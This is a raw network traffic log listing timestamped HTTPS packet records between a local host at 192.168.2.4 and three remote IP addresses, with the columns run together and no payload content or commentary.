                                                                                                                      Dec 3, 2024 08:55:24.384246111 CET49874443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:24.387761116 CET49874443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:24.387778044 CET4434987413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.387801886 CET49874443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:24.387808084 CET4434987413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.391222000 CET49890443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:24.391243935 CET4434989013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.391343117 CET49890443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:24.391597986 CET49890443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:24.391612053 CET4434989013.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.508985043 CET44349879196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.509432077 CET49879443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:24.509447098 CET44349879196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.510500908 CET44349879196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.510581970 CET49879443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:24.512223959 CET44349877196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.512496948 CET49879443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:24.512587070 CET44349879196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.512698889 CET49877443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:24.512707949 CET44349877196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.512835979 CET49879443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:24.512842894 CET44349879196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.513159037 CET44349877196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.513505936 CET49877443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:24.513571024 CET44349877196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.513638973 CET49877443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:24.521962881 CET44349876196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.522249937 CET49876443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:24.522278070 CET44349876196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.522602081 CET44349876196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.523339987 CET49876443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:24.523339987 CET49876443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:24.523391962 CET44349876196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.538474083 CET44349880196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.538780928 CET49880443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:24.538805008 CET44349880196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.539796114 CET44349880196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.539866924 CET49880443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:24.540177107 CET49880443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:24.540224075 CET44349880196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.540307045 CET49880443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:24.540313005 CET44349880196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.555330992 CET44349877196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.556490898 CET49879443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:24.558068991 CET44349878196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.558593988 CET49878443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:24.558612108 CET44349878196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.558985949 CET44349878196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.559295893 CET49878443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:24.559365034 CET44349878196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.559448957 CET49878443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:24.571806908 CET49876443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:24.587713957 CET49880443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:24.607340097 CET44349878196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.670972109 CET44349881216.58.208.228192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.671344995 CET49881443192.168.2.4216.58.208.228
                                                                                                                      Dec 3, 2024 08:55:24.671360970 CET44349881216.58.208.228192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.672391891 CET44349881216.58.208.228192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.672462940 CET49881443192.168.2.4216.58.208.228
                                                                                                                      Dec 3, 2024 08:55:24.672806025 CET49881443192.168.2.4216.58.208.228
                                                                                                                      Dec 3, 2024 08:55:24.672868013 CET44349881216.58.208.228192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.672949076 CET49881443192.168.2.4216.58.208.228
                                                                                                                      Dec 3, 2024 08:55:24.672961950 CET44349881216.58.208.228192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.713079929 CET49881443192.168.2.4216.58.208.228
                                                                                                                      Dec 3, 2024 08:55:24.859432936 CET4434988213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.859967947 CET49882443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:24.860012054 CET4434988213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.860502005 CET49882443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:24.860508919 CET4434988213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.949959993 CET44349875196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.949985981 CET44349875196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.950058937 CET49875443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:24.950078964 CET44349875196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.958324909 CET44349875196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.958388090 CET49875443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:24.958405018 CET44349875196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.958420038 CET44349875196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.958441973 CET49875443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:24.958475113 CET49875443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:24.959464073 CET49875443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:24.959485054 CET44349875196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.973207951 CET4434988413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.974965096 CET49884443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:24.974992990 CET4434988413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:24.975893021 CET49884443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:24.975898981 CET4434988413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.044198036 CET4434988313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.086704016 CET49883443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:25.095663071 CET4434988713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.101599932 CET44349886196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.136806011 CET44349885196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.137486935 CET49887443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:25.153131962 CET49886443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.178934097 CET44349889196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.181288004 CET49885443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.186878920 CET44349888196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.220844984 CET49889443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.225888968 CET49886443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.225914001 CET44349886196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.226106882 CET49888443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.226135969 CET44349888196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.226975918 CET44349886196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.226991892 CET44349886196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.227051973 CET49886443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.227296114 CET44349888196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.227309942 CET44349888196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.227349043 CET49888443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.227967978 CET49889443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.227988958 CET44349889196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.228163004 CET49885443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.228185892 CET44349885196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.229023933 CET44349889196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.229082108 CET49889443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.229896069 CET44349885196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.229949951 CET49885443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.234186888 CET49888443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.234277010 CET44349888196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.235011101 CET49886443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.235100985 CET44349886196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.238480091 CET49885443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.238579035 CET44349885196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.241477013 CET49889443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.241555929 CET44349889196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.241755009 CET49888443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.241777897 CET44349888196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.241789103 CET49886443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.241813898 CET44349886196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.241887093 CET49885443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.241897106 CET44349885196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.241923094 CET49889443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.241939068 CET44349889196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.264976978 CET49883443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:25.264993906 CET4434988313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.265471935 CET49883443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:25.265475988 CET4434988313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.265974998 CET49887443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:25.265995979 CET4434988713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.266462088 CET49887443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:25.266468048 CET4434988713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.294337034 CET49889443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.294341087 CET49885443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.294339895 CET49888443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.294341087 CET49886443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.304461002 CET4434988213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.304531097 CET4434988213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.304572105 CET49882443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:25.304753065 CET49882443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:25.304770947 CET4434988213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.304780006 CET49882443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:25.304785967 CET4434988213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.308986902 CET49891443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:25.309025049 CET4434989113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.309087038 CET49891443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:25.309205055 CET49891443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:25.309216976 CET4434989113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.346070051 CET44349879196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.346101999 CET44349879196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.346108913 CET44349879196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.346155882 CET49879443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.346169949 CET44349879196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.360496998 CET44349877196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.360517979 CET44349877196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.360570908 CET49877443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.360583067 CET44349877196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.361196995 CET44349876196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.361216068 CET44349876196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.361222982 CET44349876196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.361264944 CET49876443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.361278057 CET44349876196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.372771025 CET44349880196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.372792959 CET44349880196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.372800112 CET44349880196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.372865915 CET49880443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.372890949 CET44349880196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.401479006 CET49879443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.401705027 CET49876443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.401782990 CET49877443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.410044909 CET4434988413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.410094023 CET4434988413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.410149097 CET49884443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:25.410489082 CET49884443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:25.410505056 CET4434988413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.410516977 CET49884443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:25.410521984 CET4434988413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.414906979 CET49892443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:25.414937019 CET4434989213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.415015936 CET49892443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:25.415324926 CET49892443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:25.415333986 CET4434989213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.419893980 CET44349878196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.419923067 CET44349878196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.419985056 CET49878443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.419995070 CET44349878196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.420008898 CET44349878196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.420032978 CET49880443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.420073032 CET49878443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.431801081 CET49878443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.431813002 CET44349878196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.433201075 CET49893443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.433237076 CET44349893196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.433348894 CET49893443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.435033083 CET49893443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.435046911 CET44349893196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.438272953 CET49894443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.438292980 CET44349894196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.438348055 CET49894443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.438800097 CET49894443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.438812971 CET44349894196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.580317974 CET44349879196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.580329895 CET44349879196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.580358028 CET44349879196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.580379009 CET49879443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.580427885 CET49879443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.583214045 CET4434988713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.583295107 CET4434988713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.583338022 CET49887443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:25.583513975 CET49887443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:25.583535910 CET4434988713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.583548069 CET49887443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:25.583553076 CET4434988713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.586620092 CET49895443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:25.586662054 CET4434989513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.586731911 CET49895443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:25.586929083 CET49895443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:25.586941004 CET4434989513.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.592010021 CET44349879196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.592017889 CET44349879196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.592072964 CET49879443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.599813938 CET4434988313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.599878073 CET4434988313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.599941015 CET49883443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:25.600080013 CET49883443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:25.600100040 CET4434988313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.600111961 CET49883443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:25.600116968 CET4434988313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.602900028 CET49896443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:25.602947950 CET4434989613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.603030920 CET49896443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:25.603538990 CET44349876196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.603548050 CET44349876196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.603615046 CET49876443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.607423067 CET44349880196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.607434034 CET44349880196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.607465029 CET49896443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:25.607466936 CET44349880196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.607476950 CET4434989613.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.607513905 CET49880443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.607558966 CET49880443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.611110926 CET44349877196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.611120939 CET44349877196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.611176014 CET49877443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.614352942 CET44349879196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.614361048 CET44349879196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.614418983 CET49879443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.620138884 CET44349877196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.620194912 CET49877443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.620203972 CET44349877196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.620214939 CET44349877196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.620274067 CET49877443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.621083021 CET44349881216.58.208.228192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.621105909 CET44349880196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.621113062 CET44349880196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.621128082 CET44349881216.58.208.228192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.621159077 CET49880443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.621195078 CET49881443192.168.2.4216.58.208.228
                                                                                                                      Dec 3, 2024 08:55:25.621205091 CET44349881216.58.208.228192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.622379065 CET49877443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.622391939 CET44349877196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.622400999 CET49877443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.622432947 CET49877443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.623783112 CET44349876196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.623790979 CET44349876196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.623855114 CET49876443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.624342918 CET44349881216.58.208.228192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.624495983 CET49881443192.168.2.4216.58.208.228
                                                                                                                      Dec 3, 2024 08:55:25.627605915 CET49881443192.168.2.4216.58.208.228
                                                                                                                      Dec 3, 2024 08:55:25.627619982 CET44349881216.58.208.228192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.631339073 CET44349879196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.631345987 CET44349879196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.631398916 CET49879443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.639275074 CET44349880196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.639283895 CET44349880196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.639353037 CET49880443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.656770945 CET44349876196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.656781912 CET44349876196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.656845093 CET49876443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.661806107 CET44349880196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.661819935 CET44349880196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.661870956 CET49880443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.680294037 CET44349876196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.680304050 CET44349876196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.680360079 CET49876443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.831835032 CET44349879196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.831846952 CET44349879196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.831904888 CET49879443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.843522072 CET44349879196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.843528986 CET44349879196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.843585968 CET49879443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.850497007 CET44349880196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.850529909 CET44349880196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.850600004 CET49880443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.856880903 CET44349876196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.856892109 CET44349876196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.856954098 CET49876443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.857745886 CET44349879196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.857805967 CET49879443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.861954927 CET44349880196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.861968994 CET44349880196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.862039089 CET49880443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.871712923 CET44349879196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.871771097 CET49879443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:25.876805067 CET44349880196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:25.876873016 CET49880443192.168.2.4196.22.142.143
